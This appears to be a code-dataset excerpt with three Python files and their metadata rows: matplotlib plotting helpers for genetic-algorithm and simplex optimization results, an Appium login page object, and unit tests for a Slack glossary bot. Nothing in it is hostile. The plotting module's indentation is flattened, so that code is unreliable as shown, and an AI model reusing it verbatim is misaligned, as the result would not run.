ax.plot(x,y_best,'-k',label='max. fitness')
ax.plot(x,y_mean,'--k',label='mean fitness')
ax.set_xlabel('generation')
ax.set_ylabel('fitness')
ax.grid()
ax.legend()
return fig, ax
def _plot_convergence_ds( optimization_result ):
"""
    The `_plot_convergence_ds` function inside the optimization_plots
module visualizes the convergence of a Downhill Simplex result as obtained
via the optimization.downhill_simplex module.
"""
x = optimization_result.development['iteration']
y_best = optimization_result.development['min_cost']
y_mean = optimization_result.development['mean_cost']
# settings
params = {
'axes.labelsize': 8,
'font.size': 8,
'legend.fontsize': 8,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'lines.linewidth':1,
'grid.color':'k',
'grid.linestyle':':',
'grid.linewidth':0.5,
'legend.facecolor':'w',
'legend.edgecolor':'w',
'legend.numpoints':1,
'legend.framealpha':1,
'text.usetex': False,
'figure.figsize': [6,6]
}
pylab.rcParams.update(params)
fig,ax = pylab.subplots()
ax.plot(x,y_best,'-k',label='min. cost')
ax.plot(x,y_mean,'--k',label='mean cost')
ax.set_xlabel('iteration')
ax.set_ylabel('cost')
ax.grid()
ax.legend()
return fig, ax
def plot_objective_function( optimization_result ):
"""
    The `plot_objective_function` function inside the optimization_plots
    module visualizes the 1D or 2D cost function and the final population
of a GA result as obtained via the optimization.SOBGA or optimization.SOCGA
modules.
"""
if (isinstance(optimization_result,downhill_simplex.Simplex)):
return _plot_objective_function_ds( optimization_result )
if not (isinstance(optimization_result,SOBGA.Population) or isinstance(optimization_result,SOCGA.Population)):
warnings.warn('Please use the SOBGA or SOCGA class.')
return
f = optimization_result.config['objective_function']
if f.dimension > 2:
warnings.warn('Only 1D or 2D objective functions are supported.')
return
elif f.dimension == 1:
return _plot_objective_function1D( optimization_result )
elif f.dimension == 2:
return _plot_objective_function2D( optimization_result )
def _plot_objective_function1D( optimization_result ):
f = optimization_result.config['objective_function']
t = np.linspace(-1.0,1.0,num=100)
parameters = []
for parameter in f.parameters:
parameters.append( deepcopy(parameter) )
x = np.zeros(len(t))
for ix,ti in enumerate(t):
parameters[0].set_mapping_parameter( ti )
x[ix] = parameters[0].value
ix = np.argsort(x)
xs = [x[jx] for jx in ix]
ts = [t[jx] for jx in ix]
ys = np.ones(len(t)) * np.nan
for ix,ti in enumerate(ts):
parameters[0].set_mapping_parameter( ti )
value = f.evaluate(parameters)
if f.determine_feasibility(parameters) == 1:
ys[ix] = value
x_pop = []
y_pop = []
for individual in optimization_result.individuals:
x_pop.append( individual.genes[0].value )
value = f.evaluate( individual.genes )
y_pop.append(value)
# settings
params = {
'axes.labelsize': 8,
'font.size': 8,
'legend.fontsize': 8,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'lines.linewidth':1,
'grid.color':'k',
'grid.linestyle':':',
'grid.linewidth':0.5,
'legend.facecolor':'w',
'legend.edgecolor':'w',
'legend.numpoints':1,
'legend.framealpha':1,
'text.usetex': False,
'figure.figsize': [6,6]
}
pylab.rcParams.update(params)
fig,ax = pylab.subplots()
ax.plot(xs,ys,'-k',label='f(x)')
ax.plot(x_pop,y_pop,'xk',label='final population')
ax.plot(x_pop[0],y_pop[0],'or',label='best individual')
x_true = parameters[0].true_value
y_true = f.global_minimum
if (x_true is not None) and (y_true is not None):
ax.plot(x_true,y_true,'*b',label='global minimum')
ax.set_xlabel('x')
ax.set_ylabel('f(x)')
ax.grid()
ax.legend()
return fig, ax
def _plot_objective_function2D( optimization_result ):
f = optimization_result.config['objective_function']
tx = np.linspace(-1.0,1.0,num=100)
ty = np.linspace(-1.0,1.0,num=100)
parameters = []
for parameter in f.parameters:
parameters.append( deepcopy(parameter) )
x = np.zeros(len(tx))
y = np.zeros(len(ty))
for ix,_ in enumerate(tx):
parameters[0].set_mapping_parameter( tx[ix] )
x[ix] = parameters[0].value
parameters[1].set_mapping_parameter( ty[ix] )
        y[ix] = parameters[1].value
ix = np.argsort(x)
txs = [tx[jx] for jx in ix]
ix = np.argsort(y)
tys = [ty[jx] for jx in ix]
txg,tyg = np.meshgrid(txs,tys)
x = np.zeros(txg.shape)
y = np.zeros(txg.shape)
c = np.ones(txg.shape)*np.nan
for ix in list(range(txg.shape[0])):
for iy in list(range(txg.shape[1])):
parameters[0].set_mapping_parameter( txg[ix,iy] )
parameters[1].set_mapping_parameter( tyg[ix,iy])
x[ix,iy] = parameters[0].value
y[ix,iy] = parameters[1].value
value = f.evaluate(parameters)
if f.determine_feasibility(parameters) == 1:
c[ix,iy] = value
x_pop = []
y_pop = []
c_pop = []
for individual in optimization_result.individuals:
x_pop.append( individual.genes[0].value )
y_pop.append( individual.genes[1].value )
value = f.evaluate( individual.genes )
c_pop.append(value)
# settings
params = {
'axes.labelsize': 8,
'font.size': 8,
'legend.fontsize': 8,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'lines.linewidth':1,
'grid.color':'k',
'grid.linestyle':':',
'grid.linewidth':0.5,
'legend.facecolor':'w',
'legend.edgecolor':'w',
'legend.numpoints':1,
'legend.framealpha':1,
'text.usetex': False,
'figure.figsize': [6,6]
}
pylab.rcParams.update(params)
fig,ax = pylab.subplots()
ax.contourf(x,y,c,cmap=pylab.cm.rainbow)
# ax.imshow(c)
# ax.pcolor(x,y,c)
# ax.scatter(x,y,c=c)
ax.plot(x_pop,y_pop,'xk',label='final population')
ax.plot(x_pop[0],y_pop[0],'or',label='best individual')
x_true = parameters[0].true_value
y_true = parameters[1].true_value
if (x_true is not None) and (y_true is not None):
ax.plot(x_true,y_true,'*b',label='global minimum')
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.legend()
return fig, ax
def _plot_objective_function_ds( optimization_result ):
"""
    The `_plot_objective_function_ds` function inside the optimization_plots
    module visualizes the 1D or 2D cost function and the final population
of a DS result as obtained via the optimization.downhill_simplex module.
"""
f = optimization_result.objective_function
if f.dimension > 2:
warnings.warn('Only 1D or 2D objective functions are supported.')
return
elif f.dimension == 1:
return _plot_objective_function_ds_1D( optimization_result )
elif f.dimension == 2:
return _plot_objective_function_ds_2D( optimization_result )
def _plot_objective_function_ds_1D( optimization_result ):
f = optimization_result.objective_function
t = np.linspace(-1.0,1.0,num=100)
parameters = []
for parameter in f.parameters:
parameters.append( deepcopy(parameter) )
x = np.zeros(len(t))
for ix,ti in enumerate(t):
parameters[0].set_mapping_parameter( ti )
x[ix] = parameters[0].value
ix = np.argsort(x)
xs = [x[jx] for jx in ix]
ts = [t[jx] for jx in ix]
ys = np.ones(len(t)) * np.nan
for ix,ti in enumerate(ts):
parameters[0].set_mapping_parameter( ti )
value = f.evaluate(parameters)
if f.determine_feasibility(parameters) == 1:
ys[ix] = value
x_pop = []
y_pop = []
for vertex in optimization_result.vertices:
x_pop.append( vertex.parameters[0].value )
value = f.evaluate( vertex.parameters )
y_pop.append(value)
# settings
params = {
'axes.labelsize': 8,
'font.size': 8,
'legend.fontsize': 8,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'lines.linewidth':1,
'grid.color':'k',
'grid.linestyle':':',
'grid.linewidth':0.5,
'legend.facecolor':'w',
'legend.edgecolor':'w',
'legend.numpoints':1,
'legend.framealpha':1,
'text.usetex': False,
'figure.figsize': [6,6]
}
pylab.rcParams.update(params)
fig,ax = pylab.subplots()
ax.plot(xs,ys,'-k',label='f(x)')
ax.plot(x_pop,y_pop,'xk',label='final simplex')
ax.plot(x_pop[0],y_pop[0],'or',label='best vertex')
x_true = parameters[0].true_value
y_true = f.global_minimum
if (x_true is not None) and (y_true is not None):
ax.plot(x_true,y_true,'*b',label='global minimum')
ax.set_xlabel('x')
ax.set_ylabel('f(x)')
ax.grid()
ax.legend()
return fig, ax
def _plot_objective_function_ds_2D( optimization_result ):
f = optimization_result.objective_function
tx = np.linspace(-1.0,1.0,num=100)
ty = np.linspace(-1.0,1.0,num=100)
parameters = []
for parameter in f.parameters:
parameters.append( deepcopy(parameter) )
x = np.zeros(len(tx))
y = np.zeros(len(ty))
for ix,_ in enumerate(tx):
parameters[0].set_mapping_parameter( tx[ix] )
x[ix] = parameters[0].value
parameters[1].set_mapping_parameter( ty[ix] )
        y[ix] = parameters[1].value
ix = np.argsort(x)
txs = [tx[jx] for jx in ix]
ix = np.argsort(y)
tys = [ty[jx] for jx in ix]
txg,tyg = np.meshgrid(txs,tys)
x = np.zeros(txg.shape)
y = np.zeros(txg.shape)
c = np.ones(txg.shape)*np.nan
for ix in list(range(txg.shape[0])):
for iy in list(range(txg.shape[1])):
parameters[0].set_mapping_parameter( txg[ix,iy] )
parameters[1].set_mapping_parameter( tyg[ix,iy])
x[ix,iy] = parameters[0].value
y[ix,iy] = parameters[1].value
value = f.evaluate(parameters)
if f.determine_feasibility(parameters) == 1:
c[ix,iy] = value
x_pop = []
y_pop = []
c_pop = []
for vertex in optimization_result.vertices:
x_pop.append( vertex.parameters[0].value )
y_pop.append( vertex.parameters[1].value )
value = f.evaluate( vertex.parameters )
c_pop.append(value)
# settings
params = {
'axes.labelsize': 8,
'font.size': 8,
'legend.fontsize': 8,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'lines.linewidth':1,
'grid.color':'k',
'grid.linestyle':':',
'grid.linewidth':0.5,
'legend.facecolor':'w',
'legend.edgecolor':'w',
'legend.numpoints':1,
'legend.framealpha':1,
'text.usetex': False,
'figure.figsize': [6,6]
}
pylab.rcParams.update(params)
fig,ax = pylab.subplots()
ax.contourf(x,y,c,cmap=pylab.cm.rainbow)
# ax.imshow(c)
# ax.pcolor(x,y,c)
# ax.scatter(x,y,c=c)
ax.plot(x_pop,y_pop,'xk',label='final simplex')
ax.plot(x_pop[0],y_pop[0],'or',label='best vertex')
x_true = parameters[0].true_value
y_true = parameters[1].true_value
if (x_true is not None) and (y_true is not None):
ax.plot(x_true,y_true,'*b',label='global minimum')
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.legend()
return fig, ax
def plot_pareto_front( optimization_result ):
"""
    The `plot_pareto_front` function inside the optimization_plots
module visualizes the final population of a GA result as obtained via the
optimization.MOCGA module and highlights the obtained Pareto front.
"""
if not (isinstance(optimization_result,MOCGA.Population)):
warnings.warn('Please use the MOCGA class.')
f = optimization_result.config['objective_function']
if f.objective_dimension == 2:
return _plot_pareto_front2D( optimization_result )
elif f.objective_dimension == 3:
return _plot_pareto_front3D( optimization_result )
else:
warnings.warn('Only multi objective functions with two or three objectives are supported.')
return
def _plot_pareto_front2D( optimization_result ):
f = optimization_result.config['objective_function']
rank = [ind.rank for ind in optimization_result.archive]
x = [-ind.fitness[0] for ind in optimization_result.archive]
y = [-ind.fitness[1] for ind in optimization_result.archive]
ix = np.lexsort((x,y,rank))
rs = [rank[jx] for jx in ix]
xs = [x[jx] for jx in ix]
ys = [y[jx] for jx in ix]
xs0 = [x[jx] for jx in ix if rank[jx]==0]
ys0 = [y[jx] for jx in ix if rank[jx]==0]
# xx = [ind.genes[0].value for ind in optimization_result.archive]
# xxs0 = [('%.2f' % xx[jx]) for jx in ix if rank[jx]==0]
# settings
params = {
'axes.labelsize': 8,
'font.size': 8,
'legend.fontsize': 8,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'lines.linewidth':1,
'grid.color':'k',
'grid.linestyle':':',
'grid.linewidth':0.5,
'legend.facecolor':'w',
'legend.edgecolor':'w',
'legend.numpoints':1,
'legend.framealpha':1,
'text.usetex': False,
'figure.figsize': [6,6]
}
pylab.rcParams.update(params)
fig,ax = pylab.subplots()
ax.plot(xs0,ys0,'-r',label='Pareto front')
# for ix in list(range(len(xxs0))):
# ax.text(xs0[ix],ys0[ix],xxs0[ix])
# ax.plot(xs0,ys0,'og',label='Pareto front')
ax.plot(xs,ys,'xk',label='final archive')
ax.set_xlabel('f1')
ax.set_ylabel('f2')
ax.grid()
ax.legend()
return fig, ax
def _plot_pareto_front3D( optimization_result ):
f = optimization_result.config['objective_function']
rank = [ind.rank for ind in optimization_result.archive]
x = [-ind.fitness[0] for ind in optimization_result.archive]
y = [-ind.fitness[1] for ind in optimization_result.archive]
z = [-ind.fitness[2] for ind in optimization_result.archive]
ix = np.lexsort((x,y,z,rank))
rs = [rank[jx] for jx in ix]
xs = [x[jx] for jx in ix]
ys = [y[jx] for jx in ix]
zs = [z[jx] for jx in ix]
xs0 = [x[jx] for jx in ix if rank[jx]==0]
ys0 = [y[jx] for jx in ix if rank[jx]==0]
zs0 = [z[jx] for jx in ix if rank[jx]==0]
# settings
params = {
'axes.labelsize': 8,
'font.size': 8,
'legend.fontsize': 8,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'lines.linewidth':1,
'grid.color':'k',
'grid.linestyle':':',
'grid.linewidth':0.5,
'legend.facecolor':'w',
'legend.edgecolor':'w',
'legend.numpoints':1,
'legend.framealpha':1,
'text.usetex': False,
'figure.figsize': [6,6]
}
pylab.rcParams.update(params)
fig = pylab.figure()
ax = fig.add_subplot(111, projection='3d')
ax.plot(xs0,ys0,zs0,'-r',label='Pareto front')
ax.plot(xs,ys,zs,'xk',label='final archive')
ax.set_xlabel('f1')
ax.set_ylabel('f2')
ax.set_zlabel('f3')
ax.grid()
ax.legend()
return fig, ax
def plot_pareto_set( optimization_result ):
"""
    The `plot_pareto_set` function inside the optimization_plots
module visualizes the final population of a GA result as obtained via the
optimization.MOCGA module and highlights the obtained Pareto set.
"""
if not (isinstance(optimization_result,MOCGA.Population)):
warnings.warn('Please use the MOCGA class.')
f = optimization_result.config['objective_function']
if f.dimension == 1:
return _plot_pareto_set1D( optimization_result )
elif f.dimension == 2:
return _plot_pareto_set2D( optimization_result )
elif f.dimension == 3:
return _plot_pareto_set3D( optimization_result )
else:
warnings.warn('Only multi objective functions with one, two or three dimensions are supported.')
return
def _plot_pareto_set1D( optimization_result ):
f = optimization_result.config['objective_function']
rank = [ind.rank for ind in optimization_result.archive]
x = [ind.genes[0].value for ind in optimization_result.archive]
y = [ind.genes[0].value for ind in optimization_result.archive]
ix = np.lexsort((x,y,rank))
rs = [rank[jx] for jx in ix]
xs = [x[jx] for jx in ix]
ys = [y[jx] for jx in ix]
xs0 = [x[jx] for jx in ix if rank[jx]==0]
ys0 = [y[jx] for jx in ix if rank[jx]==0]
# settings
params = {
'axes.labelsize': 8,
'font.size': 8,
'legend.fontsize': 8,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'lines.linewidth':1,
'grid.color':'k',
'grid.linestyle':':',
'grid.linewidth':0.5,
'legend.facecolor':'w',
'legend.edgecolor':'w',
'legend.numpoints':1,
'legend.framealpha':1,
'text.usetex': False,
'figure.figsize': [6,6]
}
pylab.rcParams.update(params)
fig,ax = pylab.subplots()
ax.plot(xs0,ys0,'or',label='Pareto set')
ax.plot(xs,ys,'xk',label='final archive')
ax.set_xlabel('x')
ax.set_ylabel('x')
ax.grid()
ax.legend()
return fig, ax
def _plot_pareto_set2D( optimization_result ):
f = optimization_result.config['objective_function']
rank = [ind.rank for ind in optimization_result.archive]
x = [ind.genes[0].value for ind in optimization_result.archive]
y = [ind.genes[1].value for ind in optimization_result.archive]
ix = np.lexsort((x,y,rank))
rs = [rank[jx] for jx in ix]
xs = [x[jx] for jx in ix]
ys = [y[jx] for jx in ix]
xs0 = [x[jx] for jx in ix if rank[jx]==0]
ys0 = [y[jx] for jx in ix if rank[jx]==0]
# settings
params = {
'axes.labelsize': 8,
'font.size': 8,
'legend.fontsize': 8,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'lines.linewidth':1,
'grid.color':'k',
'grid.linestyle':':',
'grid.linewidth':0.5,
'legend.facecolor':'w',
'legend.edgecolor':'w',
'legend.numpoints':1,
'legend.framealpha':1,
'text.usetex': False,
'figure.figsize': [6,6]
}
pylab.rcParams.update(params)
fig,ax = pylab.subplots()
ax.plot(xs0,ys0,'or',label='Pareto set')
ax.plot(xs,ys,'xk',label='final archive')
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.grid()
ax.legend()
return fig, ax
def _plot_pareto_set3D( optimization_result ):
f = optimization_result.config['objective_function']
rank = [ind.rank for ind in optimization_result.archive]
x = [ind.genes[0].value for ind in optimization_result.archive]
y = [ind.genes[1].value for ind in optimization_result.archive]
z = [ind.genes[2].value for ind in optimization_result.archive]
ix = np.lexsort((x,y,z,rank))
rs = [rank[jx] for jx in ix]
xs = [x[jx] for jx in ix]
ys = [y[jx] for jx in ix]
zs = [z[jx] for jx in ix]
xs0 = [x[jx] for jx in ix if rank[jx]==0]
ys0 = [y[jx] for jx in ix if rank[jx]==0]
zs0 = [z[jx] for jx in ix if rank[jx]==0]
# settings
params = {
'axes.labelsize': 8,
'font.size': 8,
'legend.fontsize': 8,
'xtick.labelsize': 8,
'ytick.labelsize': 8,
'lines.linewidth':1,
'grid.color':'k',
'grid.linestyle':':',
'grid.linewidth':0.5,
'legend.facecolor':'w',
'legend.edgecolor':'w',
'legend.numpoints':1,
'legend.framealpha':1,
'text.usetex': False,
'figure.figsize': [6,6]
}
pylab.rcParams.update(params)
fig = pylab.figure()
ax = fig.add_subplot(111, projection='3d')
ax.plot(xs0,ys0,zs0,'-r',label='Pareto set')
ax.plot(xs,ys,zs,'xk',label='final archive')
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.set_zlabel('z')
ax.grid()
ax.legend()
return fig, ax
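# --- Usage sketch (not part of the original module; added for illustration) ---
# The public helpers above (plot_convergence, plot_objective_function,
# plot_pareto_front, plot_pareto_set) all take a finished optimization result
# and return a (fig, ax) pair, so persisting a plot is just a savefig call on
# the returned figure. How the result object is produced belongs to the
# optimization package and is only hinted at here; the calls below are hypothetical.
#
# population = ...  # a SOBGA/SOCGA/MOCGA Population (or a downhill_simplex Simplex)
#                   # obtained from the corresponding optimization module
# fig, ax = plot_convergence(population)
# fig.savefig('convergence.png', dpi=150)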
| 34.458589
| 114
| 0.607825
| 3,071
| 22,467
| 4.337349
| 0.074569
| 0.101351
| 0.01997
| 0.025676
| 0.937838
| 0.906081
| 0.871396
| 0.849474
| 0.835135
| 0.814114
| 0
| 0.020561
| 0.248809
| 22,467
| 651
| 115
| 34.511521
| 0.768679
| 0.083589
| 0
| 0.857895
| 0
| 0
| 0.169279
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026316
| false
| 0
| 0.019298
| 0
| 0.094737
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4abcefa975f4ec814f0ffafef38c6be450bc80ea
| 1,725
|
py
|
Python
|
App/LoginPage.py
|
tartaruswh/SaaSCyberWaterSupplyGWAuto
|
07b43c67e059a5b602957d94e9f441e74d12bde1
|
[
"Apache-2.0"
] | null | null | null |
App/LoginPage.py
|
tartaruswh/SaaSCyberWaterSupplyGWAuto
|
07b43c67e059a5b602957d94e9f441e74d12bde1
|
[
"Apache-2.0"
] | null | null | null |
App/LoginPage.py
|
tartaruswh/SaaSCyberWaterSupplyGWAuto
|
07b43c67e059a5b602957d94e9f441e74d12bde1
|
[
"Apache-2.0"
] | null | null | null |
import time
import pytest
from appium.webdriver.common.mobileby import MobileBy
from App.AccountPasswordPage import AccountPasswordPage
from App.BasePage import BasePage
class LoginPage(BasePage):
    # Click the account/password login button and go to the account/password login page
def goto_accountPasswordPage(self):
time.sleep(2)
        # Click the account/password login button and go to the account/password login page
self.find(MobileBy.XPATH,'/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.FrameLayout/android.widget.FrameLayout/'
'android.view.ViewGroup/android.widget.FrameLayout/android.widget.LinearLayout/android.webkit.WebView/android.webkit.WebView/android.view.View[8]').click()
#time.sleep(2)
        # # Wait for the "公司" ("Company") label on the account/password login page to be displayed
# self.cf_webDriverWaitUnitlIsDisplayed(MobileBy.XPATH,
# "/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.FrameLayout/android.widget.FrameLayout/"
# "android.view.ViewGroup/android.widget.FrameLayout/android.widget.LinearLayout/android.webkit.WebView/android.webkit.WebView/android.view.View[3]")
        # Verify that the "公司" ("Company") label on the account/password login page is displayed correctly
# pytest.assume(self.find(MobileBy.XPATH,
# "/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.FrameLayout/android.widget.FrameLayout/"
# "android.view.ViewGroup/android.widget.FrameLayout/android.widget.LinearLayout/android.webkit.WebView/android.webkit.WebView/android.view.View[3]").text == "公司")
return AccountPasswordPage(self.getDriver())
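# --- Usage sketch (not part of the original page object; added for illustration) ---
# In the page-object pattern used above, navigation methods return the next page
# object, so a test typically chains them. The driver setup below is assumed, not
# taken from this file.
#
# driver = ...  # an appium webdriver.Remote session configured elsewhere
# account_password_page = LoginPage(driver).goto_accountPasswordPage()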
| 61.607143
| 197
| 0.706087
| 171
| 1,725
| 7.111111
| 0.269006
| 0.224507
| 0.296053
| 0.382401
| 0.67352
| 0.67352
| 0.67352
| 0.67352
| 0.67352
| 0.67352
| 0
| 0.003561
| 0.186087
| 1,725
| 27
| 198
| 63.888889
| 0.862536
| 0.538551
| 0
| 0
| 0
| 0.181818
| 0.371648
| 0.371648
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0.272727
| 0.454545
| 0
| 0.727273
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
4ac57d79f17cecd6cc886b5e0f5abe55924b11ad
| 38,299
|
py
|
Python
|
tests/test_bot.py
|
toptal/glossary-bot
|
33e8c7fdfd7c1675af27beba7cf534e8bffe60d6
|
[
"MIT"
] | 2
|
2019-07-12T10:51:18.000Z
|
2020-02-22T09:09:17.000Z
|
tests/test_bot.py
|
toptal/glossary-bot
|
33e8c7fdfd7c1675af27beba7cf534e8bffe60d6
|
[
"MIT"
] | null | null | null |
tests/test_bot.py
|
toptal/glossary-bot
|
33e8c7fdfd7c1675af27beba7cf534e8bffe60d6
|
[
"MIT"
] | 1
|
2020-01-09T16:16:34.000Z
|
2020-01-09T16:16:34.000Z
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
import unittest
import json
from httmock import response, HTTMock
from flask import current_app
from gloss.models import Definition, Interaction
from gloss.views import query_definition
from datetime import datetime, timedelta
from tests.test_base import TestBase
class TestBot(TestBase):
def setUp(self):
super(TestBot, self).setUp()
self.db.create_all()
def test_app_exists(self):
''' The app exists
'''
self.assertFalse(current_app is None)
def test_unauthorized_access(self):
''' The app rejects unauthorized access
'''
robo_response = self.client.post('/', data={'token': 'woofer_token'})
self.assertEqual(robo_response.status_code, 401)
def test_authorized_access(self):
''' The app accepts authorized access
'''
robo_response = self.post_command(text=u'')
self.assertEqual(robo_response.status_code, 200)
def test_set_definition(self):
''' A definition set via a POST is recorded in the database
'''
robo_response = self.post_command(text=u'EW = Eligibility Worker')
self.assertTrue(u'has set the definition' in robo_response.data)
filter = Definition.term == u'EW'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'EW')
self.assertEqual(definition_check.definition, u'Eligibility Worker')
def test_set_definition_with_lots_of_whitespace(self):
''' Excess whitespace is trimmed when parsing the set command.
'''
robo_response = self.post_command(text=u' EW = Eligibility Worker ')
self.assertTrue(u'has set the definition' in robo_response.data)
filter = Definition.term == u'EW'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'EW')
self.assertEqual(definition_check.definition, u'Eligibility Worker')
def test_set_definition_with_multiple_equals_signs(self):
''' A set with multiple equals signs considers all equals signs after
the first to be part of the definition
'''
robo_response = self.post_command(text=u'EW = Eligibility Worker = Cool Person=Yeah')
self.assertTrue(u'has set the definition' in robo_response.data)
filter = Definition.term == u'EW'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'EW')
self.assertEqual(definition_check.definition, u'Eligibility Worker = Cool Person=Yeah')
def test_reset_definition(self):
''' Setting a definition for an existing term overwrites the original
'''
robo_response = self.post_command(text=u'EW = Eligibility Worker')
self.assertTrue(u'has set the definition' in robo_response.data)
filter = Definition.term == u'EW'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'EW')
self.assertEqual(definition_check.definition, u'Eligibility Worker')
robo_response = self.post_command(text=u'EW = Egg Weathervane')
self.assertTrue(u'overwriting the previous entry' in robo_response.data)
filter = Definition.term == u'EW'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'EW')
self.assertEqual(definition_check.definition, u'Egg Weathervane')
def test_set_same_word_with_different_capitalization(self):
''' We can't set different definitions for the same word by using different cases
'''
robo_response = self.post_command(text=u'lower case = NOT UPPER CASE')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'has set the definition' in robo_response.data)
filter = Definition.term == u'lower case'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'lower case')
self.assertEqual(definition_check.definition, u'NOT UPPER CASE')
robo_response = self.post_command(text=u'LOWER CASE = really not upper case')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'overwriting the previous entry' in robo_response.data)
def test_set_identical_definition(self):
''' Correct response for setting an identical definition for an existing term
'''
robo_response = self.post_command(text=u'EW = Eligibility Worker')
self.assertTrue(u'has set the definition' in robo_response.data)
filter = Definition.term == u'EW'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'EW')
self.assertEqual(definition_check.definition, u'Eligibility Worker')
robo_response = self.post_command(text=u'EW = Eligibility Worker')
self.assertTrue(u'already knows that the definition for' in robo_response.data)
def test_set_command_word_definitions(self):
        ''' We can successfully set and get definitions for unreserved command words.
'''
robo_response = self.post_command(text=u'SHH = Sonic Hedge Hog')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'has set the definition' in robo_response.data)
filter = Definition.term == u'SHH'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'SHH')
self.assertEqual(definition_check.definition, u'Sonic Hedge Hog')
robo_response = self.post_command(text=u'SSH = Secure SHell')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'has set the definition' in robo_response.data)
filter = Definition.term == u'SSH'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'SSH')
self.assertEqual(definition_check.definition, u'Secure SHell')
robo_response = self.post_command(text=u'Delete = Remove or Obliterate')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'has set the definition' in robo_response.data)
filter = Definition.term == u'Delete'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'Delete')
self.assertEqual(definition_check.definition, u'Remove or Obliterate')
robo_response = self.post_command(text=u'help me = I\'m in hell')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'has set the definition' in robo_response.data)
filter = Definition.term == u'help me'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'help me')
self.assertEqual(definition_check.definition, u'I\'m in hell')
def test_failed_set_command_word_definitions(self):
''' We can't successfully set and get definitions for reserved command words.
'''
robo_response = self.post_command(text=u'Stats = Statistics')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'because it\'s a reserved term' in robo_response.data)
robo_response = self.post_command(text=u'help = aid')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'because it\'s a reserved term' in robo_response.data)
robo_response = self.post_command(text=u'LeArNiNgS = recently')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'because it\'s a reserved term' in robo_response.data)
robo_response = self.post_command(text=u'? = riddle me this')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'because it\'s a reserved term' in robo_response.data)
def test_get_definition(self):
        ''' We can successfully set and get a definition from the bot
'''
# set & test a definition
self.post_command(text=u'EW = Eligibility Worker')
filter = Definition.term == u'EW'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'EW')
self.assertEqual(definition_check.definition, u'Eligibility Worker')
# capture the bot's POST to the incoming webhook and test its content
def response_content(url, request):
if 'hooks.example.com' in url.geturl():
payload = json.loads(request.body)
self.assertIsNotNone(payload['username'])
self.assertIsNotNone(payload['text'])
self.assertTrue(u'glossie' in payload['text'])
self.assertTrue(u'gloss EW' in payload['text'])
self.assertEqual(payload['channel'], u'123456')
self.assertIsNotNone(payload['icon_emoji'])
attachment = payload['attachments'][0]
self.assertIsNotNone(attachment)
self.assertEqual(attachment['title'], u'EW')
self.assertEqual(attachment['text'], u'Eligibility Worker')
self.assertIsNotNone(attachment['color'])
self.assertIsNotNone(attachment['fallback'])
return response(200)
# send a POST to the bot to request the definition
with HTTMock(response_content):
fake_response = self.post_command(text=u'EW')
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
# the request was recorded in the interactions table
interaction_check = self.db.session.query(Interaction).first()
self.assertIsNotNone(interaction_check)
self.assertEqual(interaction_check.user_name, u'glossie')
self.assertEqual(interaction_check.term, u'EW')
